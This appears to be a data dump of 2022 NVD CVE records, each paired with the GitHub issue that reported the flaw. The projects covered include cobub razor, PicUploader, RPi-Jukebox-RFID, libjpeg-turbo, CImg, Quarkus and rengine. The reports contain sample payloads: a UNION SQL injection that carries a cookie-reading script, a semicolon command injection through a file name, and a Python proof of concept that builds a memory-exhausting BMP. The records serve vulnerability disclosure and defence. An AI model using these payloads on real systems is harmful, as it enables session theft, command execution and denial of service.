{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/enferas/b00038c9add210ab639c13e0729425c9" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cobub/razor/issues/176" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/enferas/b00038c9add210ab639c13e0729425c9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cobub/razor/issues/176" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cobub:razor:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "685B8616-266E-4588-BB94-748233156F4B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/cobub/razor/issues/176
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cobub", "razor" ]
Hello, I would like to report for XSS vulnerability. In file https://github.com/cobub/razor/blob/2c991aff4a9c83f99e77a03e26056715706f15c0/web/application/controllers/manage/product.php ```php //line 98 function uploadchannel() { $platform = $_POST['platform']; $channel = $this->channel->getchanbyplat($platform); echo json_encode($channel); } ``` In file https://github.com/cobub/razor/blob/2c991aff4a9c83f99e77a03e26056715706f15c0/web/application/models/channelmodel.php#L421 ```php //line 421 function getchanbyplat($platform) { $userid=$this->common->getUserId(); $sql="select * from ".$this->db->dbprefix('channel')." where active=1 and platform='$platform' and type='system' union select * from ".$this->db->dbprefix('channel')." where active=1 and platform='$platform' and type='user'and user_id=$userid"; $query = $this->db->query($sql); if ($query!=null&&$query->num_rows()>0) { return $query->result_array(); } return null; } ``` We can see that the $platform variable is used inside the the sql query without sanitization. So the attacker can use the UNION command inside the platform to join a harmful input to the results of the query. For example: $platform = 'something' UNION select '<script>alert(document.cookie)<\script>' AS '. Thus the XSS will happen at `echo json_encode($channel);` I recommend to have a check and delete for the character (') in the platform variable.
XSS vulnerability
https://api.github.com/repos/cobub/razor/issues/176/comments
1
2022-07-18T16:02:27Z
2022-09-13T17:53:35Z
https://github.com/cobub/razor/issues/176
1,308,172,462
176
4,068
CVE-2022-36748
2022-08-30T22:15:09.583
PicUploader v2.6.3 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /master/index.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xiebruce/PicUploader/issues/80" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xiebruce/PicUploader/issues/80" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:picuploader_project:picuploader:2.6.3:*:*:*:*:*:*:*", "matchCriteriaId": "9FBB4CBD-45D3-4117-8510-4048A5E321B7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/xiebruce/PicUploader/issues/80
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xiebruce", "PicUploader" ]
Hello, I would like to report for possible XSS vulnerability. In file https://github.com/xiebruce/PicUploader/blob/master/index.php ```php $data = [ 'code' => 'success', 'data' => [ 'filename' => $_FILES['file']['name'], 'url' => $isWeb ? $link['formatLink'] : $link, //专用于web上传,其它客户端上传该参数无用 'notFormatUrl' => $isWeb ? $link['notFormatLink'] : '', ], ]; header('Content-Type: application/json; charset=UTF-8'); $json = json_encode($data, JSON_UNESCAPED_UNICODE); echo $json; ``` It is possible to do the injection with the name of the file through $_FILES['file']['name'].
XX vulnerability in index.php
https://api.github.com/repos/xiebruce/PicUploader/issues/80/comments
9
2022-07-22T20:45:18Z
2023-06-25T13:45:44Z
https://github.com/xiebruce/PicUploader/issues/80
1,315,403,588
80
4,069
CVE-2022-36749
2022-08-30T22:15:09.630
RPi-Jukebox-RFID v2.3.0 was discovered to contain a command injection vulnerability via the component /htdocs/utils/Files.php. This vulnerability is exploited via a crafted payload injected into the file name of an uploaded file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/1859" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/1859" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sourcefabric:rpi-jukebox-rfid:2.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "D564CC8A-AFE5-48C3-910C-08BDEF93FBEA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/1859
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "MiczFlor", "RPi-Jukebox-RFID" ]
Hello, I would like to report for possible vulnerability. In file https://github.com/MiczFlor/RPi-Jukebox-RFID/blob/develop/htdocs/trackEdit.php ```php //line 136 if(isset($_GET['folder']) && $_GET['folder'] != "") { $post['folder'] = $_GET['folder']; } else { if(isset($_POST['folder']) && $_POST['folder'] != "") { $post['folder'] = $_POST['folder']; } } if(isset($_GET['filename']) && $_GET['filename'] != "") { $post['filename'] = $_GET['filename']; } else { if(isset($_POST['filename']) && $_POST['filename'] != "") { $post['filename'] = $_POST['filename']; } } //line 249 $fileName = Files::buildPath($post['folder'], $post['filename']); $exec = "mid3v2 -l '" .$fileName ."'" ; ``` In file https://github.com/MiczFlor/RPi-Jukebox-RFID/blob/develop/htdocs/utils/Files.php ```php public static function buildPath(...$pieces) { return implode(DIRECTORY_SEPARATOR, $pieces); } ``` So the attacker can control the command injection through the filename. The attacker can add ';' and add another command like (echo <script>alert(document.cookie)<\script>. The output pf the command will be printed through this path. In file https://github.com/MiczFlor/RPi-Jukebox-RFID/blob/develop/htdocs/trackEdit.php ```php //line 252 // note: the output of the command is in $res $lines = explode(PHP_EOL, $res); foreach($lines as $line) { $parts = explode("=",$line); $key = trim(array_shift($parts)); // take the first $val = trim(implode("=",$parts)); // put the rest back together if (in_array($key, $trackDat['metaKeys']['mp3'])) { $trackDat['existingTags'][$key] = $val; } } //line 496 if (isset($trackDat['existingTags']['TCOM']) && trim($trackDat['existingTags']['TCOM']) != "") { echo trim($trackDat['existingTags']['TCOM']); } ``` Finally, I recommend using escapeshellarg function with the $_GET['folder'], $_POST['folder'], $_GET['filename'] and $_POST['filename']
🐛 | Command Injection and XSS vulnerabilities reports
https://api.github.com/repos/MiczFlor/RPi-Jukebox-RFID/issues/1859/comments
4
2022-07-18T14:10:45Z
2024-09-15T09:50:33Z
https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/1859
1,308,022,012
1,859
4,070
CVE-2020-35538
2022-08-31T16:15:09.040
A crafted input file could cause a null pointer dereference in jcopy_sample_rows() when processed by libjpeg-turbo.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libjpeg-turbo/libjpeg-turbo/commit/9120a247436e84c0b4eea828cb11e8f665fcde30" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/441" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libjpeg-turbo/libjpeg-turbo/commit/9120a247436e84c0b4eea828cb11e8f665fcde30" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/441" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libjpeg-turbo:libjpeg-turbo:2.0.5:*:*:*:*:*:*:*", "matchCriteriaId": "5130BD31-63BD-48B0-9B1C-E01B3484FD05", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/libjpeg-turbo/libjpeg-turbo/issues/441
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libjpeg-turbo", "libjpeg-turbo" ]
**Have you searched the existing issues (both open and closed) in the libjpeg-turbo issue tracker to ensure that this bug report is not a duplicate?** Yes **Does this bug report describe one of the [two known and unsolvable issues with the JPEG format](https://libjpeg-turbo.org/pmwiki/uploads/About/TwoIssueswiththeJPEGStandard.pdf)?** No **Clear and concise description of the bug:** jcopy_sample_rows try to read *0x8 causes SIGSEGV 0x00007ffff7b7d48a in jcopy_sample_rows (input_array=0x555555764728, source_row=0x0, output_array=0x8, dest_row=0x0, num_rows=0x1, num_cols=0x60) at /home/yuan/libjpeg-turbo/jutils.c:112 112 outptr = *output_array++; **Steps to reproduce the bug (using *only* libjpeg-turbo):** in read_and_discard_scanlines() , it calls jpeg_read_scanlines(cinfo, NULL, 1); However NULL will be output array address in jcopy_sample_rows(). **Image(s) needed in order to reproduce the bug (if applicable):** ![sample](https://user-images.githubusercontent.com/25863161/86568115-f7b82580-bf9e-11ea-95bf-a36bfd43e649.jpg) **Expected behavior:** **Observed behavior:** ``` ./djpeg -fast -skip 1,20 -outfile ./outt ./sample.jpg gdb-peda$ bt #0 0x00007ffff7b7d48a in jcopy_sample_rows (input_array=0x555555764728, source_row=0x0, output_array=0x8, dest_row=0x0, num_rows=0x1, num_cols=0x60) at /home/yuan/libjpeg-turbo/jutils.c:112 #1 0x00007ffff7b61454 in merged_2v_upsample (cinfo=0x7fffffffd970, input_buf=0x555555766610, in_row_group_ctr=0x555555766664, in_row_groups_avail=0x8, output_buf=0x0, out_row_ctr=0x7fffffffd764, out_rows_avail=0x1) at /home/yuan/libjpeg-turbo/jdmerge.c:266 #2 0x00007ffff7b5b5a1 in process_data_simple_main (cinfo=0x7fffffffd970, output_buf=0x0, out_row_ctr=0x7fffffffd764, out_rows_avail=0x1) at /home/yuan/libjpeg-turbo/jdmainct.c:313 #3 0x00007ffff7b4dcc1 in jpeg_read_scanlines (cinfo=0x7fffffffd970, scanlines=0x0, max_lines=0x1) at /home/yuan/libjpeg-turbo/jdapistd.c:285 #4 0x00007ffff7b4ddfb in read_and_discard_scanlines (cinfo=0x7fffffffd970, num_lines=0x1) at /home/yuan/libjpeg-turbo/jdapistd.c:336 #5 0x00007ffff7b4dec9 in increment_simple_rowgroup_ctr (cinfo=0x7fffffffd970, rows=0x5) at /home/yuan/libjpeg-turbo/jdapistd.c:366 #6 0x00007ffff7b4e46d in jpeg_skip_scanlines (cinfo=0x7fffffffd970, num_lines=0x14) at /home/yuan/libjpeg-turbo/jdapistd.c:530 #7 0x0000555555557638 in main (argc=0x7, argv=0x7fffffffdcd8) at /home/yuan/libjpeg-turbo/djpeg.c:711 #8 0x00007ffff7754b97 in __libc_start_main (main=0x555555556f8c <main>, argc=0x7, argv=0x7fffffffdcd8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdcc8) at ../csu/libc-start.c:310 #9 0x0000555555555c6a in _start () ``` **Platform(s) (compiler version, operating system version, CPU) on which the bug was observed:** gcc (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0 , Linux version 5.3.0-61-generic **libjpeg-turbo release(s), commit(s), or branch(es) in which the bug was observed (always test the tip of the master branch or the latest [stable pre-release](https://libjpeg-turbo.org/DeveloperInfo/PreReleases) to verify that the bug hasn't already been fixed):** commit ae87a958613b69628b92088b313ded0d4f59a716 in master **If the bug is a regression, the specific commit that introduced the regression (use `git bisect` to determine this):** **Additional information:**
jcopy_sample_rows() causes SIGSEGV
https://api.github.com/repos/libjpeg-turbo/libjpeg-turbo/issues/441/comments
4
2020-07-06T07:45:09Z
2021-12-23T16:23:45Z
https://github.com/libjpeg-turbo/libjpeg-turbo/issues/441
651,322,599
441
4,071
CVE-2022-1325
2022-08-31T16:15:09.467
A flaw was found in Clmg, where with the help of a maliciously crafted pandore or bmp file with modified dx and dy header field values it is possible to trick the application into allocating huge buffer sizes like 64 Gigabyte upon reading the file from disk or from a virtual buffer.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Broken Link" ], "url": "https://access.redhat.com/security/cve/CVE-2022-1325" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2074549" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/GreycLab/CImg/commit/619cb58dd90b4e03ac68286c70ed98acbefd1c90" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/GreycLab/CImg/issues/343" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/GreycLab/CImg/pull/348" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://huntr.dev/bounties/a5e4fc45-8f14-4dd1-811b-740fc50c95d2/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://access.redhat.com/security/cve/CVE-2022-1325" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2074549" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/GreycLab/CImg/commit/619cb58dd90b4e03ac68286c70ed98acbefd1c90" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/GreycLab/CImg/issues/343" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/GreycLab/CImg/pull/348" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://huntr.dev/bounties/a5e4fc45-8f14-4dd1-811b-740fc50c95d2/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cimg:cimg:*:*:*:*:*:*:*:*", "matchCriteriaId": "5BC6B9AC-0442-4A13-BE55-DC1B28A0700B", "versionEndExcluding": "3.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/GreycLab/CImg/issues/343
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "GreycLab", "CImg" ]
# Description Via a maliciously crafted pandore or bmp file with modified dx and dy header field values it is possible to trick the application into allocating huge buffer sizes like 64 Gigabyte upon reading the file from disk or from a virtual buffer. # Version This does affect the newest Version of Cimg which is 3.10, commit 607aea7c89fd66470e58a77b126584132d9af8f8 as the time of writing. # Proof of Concept Due to the fact that I cannot attach bmp files in this format, here is a small python script that will generate a bmp file with given dimmensions. Note that the final buffer size is calculated by multiplying the product of width and height by 3. This code snippet uses a sample value of 5 GB. ``` import struct def write_size(dx,dy): x = struct.pack('I',dx) y = struct.pack('I',dy) min_bmp_head = list( b'BM\xf2Y\x03\x00\x00\x00\x00\x006\x04\x00\x00(\x00\x00\x00 \ V\xa8\xab1\x02\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00 \ \xbcU\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \ \x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x01\x01\x00\x03\x03' ) min_bmp_head[0x12] = x[0] min_bmp_head[0x13] = x[1] min_bmp_head[0x14] = x[2] min_bmp_head[0x15] = x[3] min_bmp_head[0x16] = y[0] min_bmp_head[0x17] = y[1] min_bmp_head[0x18] = y[2] min_bmp_head[0x19] = y[3] open('crash.bmp','wb').write(bytes(min_bmp_head)) write_size(833333334,2) # use these two parameters to control dx and dy of the image. 833333334,2 for 5 GB ``` then read the file via standard methods: ``` #define cimg_display 0 #include "CImg.h" #include <iostream> int main(int argc,const char* argv[]){ if (argc < 2){ printf("no img\n"); exit(1); } cimg_library::CImg<unsigned char> img; img.assign(argv[1]); } ``` The code was compiled with g++ version 9.4.0 on Ubuntu 9.4.0-1ubuntu1~20.04 via ```g++ test.cpp -o ./test -ljpeg -lpng``` # Root cause _line numbers refer to main branch with commit 927fee511fe4fcc1ae5cdf2365a60048fe4ff935_ altough safe_size (line 11771) does check for overflows of the size_t type, it does allow very large values . One would think that the try/catch block ```try { _data = new T[siz]; }``` (line 11885) does not allow for allocations that are too big and would completely circumvent this attack but actually, allocations that are equal to the maximum available RAM of a system or even numbers that are a bit higher (I tested the 5 GB case on a 4GB RAM machine) will *not* thorw an exception like std::bad_alloc. # Impact This vulnerability allows an attacker who can send images to an application to force an premature process exit and exhaust system memory, potentially leading to a full system denial of service. # Prevention One could define a global constant that regulates the maximum value safe_size can return. The user then could change the default value depending on context.
Denial of service via RAM exhaustion in _load_bmp
https://api.github.com/repos/GreycLab/CImg/issues/343/comments
18
2022-04-02T13:56:36Z
2022-09-27T09:01:50Z
https://github.com/GreycLab/CImg/issues/343
1,190,640,729
343
4,072
CVE-2022-2466
2022-08-31T16:15:10.943
It was found that Quarkus 2.10.x does not terminate HTTP requests header context which may lead to unpredictable behavior.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/quarkusio/quarkus/issues/26748" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/quarkusio/quarkus/issues/26748" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:*", "matchCriteriaId": "10673B6C-4242-4C0A-9CC2-888ACF185D66", "versionEndExcluding": "2.10.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.10.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "444" ]
444
https://github.com/quarkusio/quarkus/issues/26748
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "quarkusio", "quarkus" ]
### Describe the bug ~~Upgrading from Quarkus 2.9.x to 2.10.x whenever i try to access `RoutingContext` request from a bean i get always the headers of the first request that have been made to the app.~~ ~~This happens on both @GraphQLApi endpoints and event in any CDI bean that consumes `RoutingContext` or `HttpServerRequest`.~~ ~~Also by debugging, the CurrentVertxRequest has always stale headers.~~ **Update:** The request context was not terminated. The issue is not related to the Routing Context. My dependencies are the following: ```xml <dependency> <groupId>io.quarkus</groupId> <artifactId>quarkus-kotlin</artifactId> </dependency> <dependency> <groupId>io.quarkus</groupId> <artifactId>quarkus-smallrye-graphql</artifactId> </dependency> <dependency> <groupId>io.smallrye</groupId> <artifactId>smallrye-jwt</artifactId> </dependency> <dependency> <groupId>io.quarkus</groupId> <artifactId>quarkus-rest-client</artifactId> </dependency> <dependency> <groupId>io.quarkus</groupId> <artifactId>quarkus-resteasy</artifactId> </dependency> <dependency> <groupId>io.quarkus</groupId> <artifactId>quarkus-rest-client-jackson</artifactId> </dependency> <dependency> <groupId>io.quarkus</groupId> <artifactId>quarkus-arc</artifactId> </dependency> <dependency> <groupId>io.quarkus</groupId> <artifactId>quarkus-undertow</artifactId> </dependency> <dependency> <groupId>org.jetbrains.kotlin</groupId> <artifactId>kotlin-stdlib-jdk8</artifactId> </dependency> ``` CDI bean: ```kotlin @ApplicationScoped class JWTAwareContext @Inject constructor( val routingContext: RoutingContext ): Context { override fun getTenant(): String { return parseClaims()!!.getClaimValueAsString("realm") } override fun getUser(): String { return parseClaims()!!.getClaimValueAsString("email") } fun parseClaims(): JwtClaims? { val rawToken = this.routingContext.request().headers().get("Authorization")?.replace("Bearer ", "") // --> this will always stale in 2.10.x if (rawToken != null) { val jsonClaims = String(Base64.getUrlDecoder().decode(rawToken.split(".")[1]), StandardCharsets.UTF_8) return JwtClaims.parse(jsonClaims) } throw PassProNextForbiddenExceptionGQL(ApiError("Missing Token", ErrorCode.FORBIDDEN)) } } ``` Graphql endpoint ```kotlin @GraphQLApi class Test { @Inject lateinit var routingContext: RoutingContext @Query fun test(): String { return "hello"; } } ``` With 2.9.x works correctly. ### Expected behavior Everytime a new Request is performed by a client, the Request headers should be inline with the actual HTTP Request ### Actual behavior With 2.10.x the first request headers became like cached value and any subsequent request headers will contain those instead of the actual headers ### How to Reproduce? 1) create an app with Quarkus 2.10.1 - 2.10.2 and the smallrye graphql extension 2) create an endpoint or a bean injecting RoutingContext 3) set some HTTP headers like Authorization, MyCustomHeader etc and send the http request 4) print RoutingContext.request().headers 5) set others HTTP headers or remove the previous and send the new http request 6) the second request headers will contain first request data also if you did not send them 7 ) switch to quarkus 2.9.x and will work as expected ### Output of `uname -a` or `ver` _No response_ ### Output of `java -version` adopt-openjdk-11.0.8 ### GraalVM version (if different from Java) _No response_ ### Quarkus version or git rev 2.10.1 - 2.10.2 ### Build tool (ie. output of `mvnw --version` or `gradlew --version`) 3.8.1 ### Additional information _No response_
CVE-2022-2466 - Request Context not terminated with GraphQL
https://api.github.com/repos/quarkusio/quarkus/issues/26748/comments
28
2022-07-15T07:32:30Z
2022-07-26T14:51:35Z
https://github.com/quarkusio/quarkus/issues/26748
1,305,687,135
26,748
4,073
CVE-2022-36566
2022-08-31T18:15:08.607
Rengine v1.3.0 was discovered to contain a command injection vulnerability via the scan engine function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zongdeiqianxing/rengine/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zongdeiqianxing/rengine/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yogeshojha:rengine:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "D7EC7544-DE01-459C-AAEE-BA6815D98AFB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/zongdeiqianxing/rengine/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "zongdeiqianxing", "rengine" ]
https://github.com/yogeshojha/rengine The rce vulnerability is caused by the code reading the value from the yaml file and splicing it directly into the os.system statement. [ github permark](https://github.com/yogeshojha/rengine/blob/67ca0a4350c4fb4b3d9a25c01db7024e170ff12a/web/reNgine/tasks.py#L1692-L1708) ![image](https://user-images.githubusercontent.com/34082644/179657556-794eba05-0ffc-4d8b-aa20-0875e48cc7da.png) ==================== If you try to reproduce the vulnerability, add the command you want to execute in the scan engine template in the background, then create a target and select the scan engine template for scanning. After a while, you will find that the command is successfully executed. ![image](https://user-images.githubusercontent.com/34082644/179655929-8229a9c9-6bbb-4707-8321-87f9494bcd2b.png) ![image](https://user-images.githubusercontent.com/34082644/179655954-cd0db5f7-d7f2-4c32-a0b9-4cd1ac15b825.png) ![image](https://user-images.githubusercontent.com/34082644/179655984-4dea2053-6de7-4d55-94f7-af3dcd314fd3.png)
There is an OS Command Injection vulnerability in the scan engine function configuration of rengine 1.3.0
https://api.github.com/repos/zongdeiqianxing/rengine/issues/2/comments
0
2022-07-19T03:10:43Z
2022-07-19T03:22:33Z
https://github.com/zongdeiqianxing/rengine/issues/2
1,308,916,097
2
4,074
CVE-2020-35530
2022-09-01T18:15:08.770
In LibRaw, there is an out-of-bounds write vulnerability within the "new_node()" function (libraw\src\x3f\x3f_utils_patched.cpp) that can be triggered via a crafted X3F file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
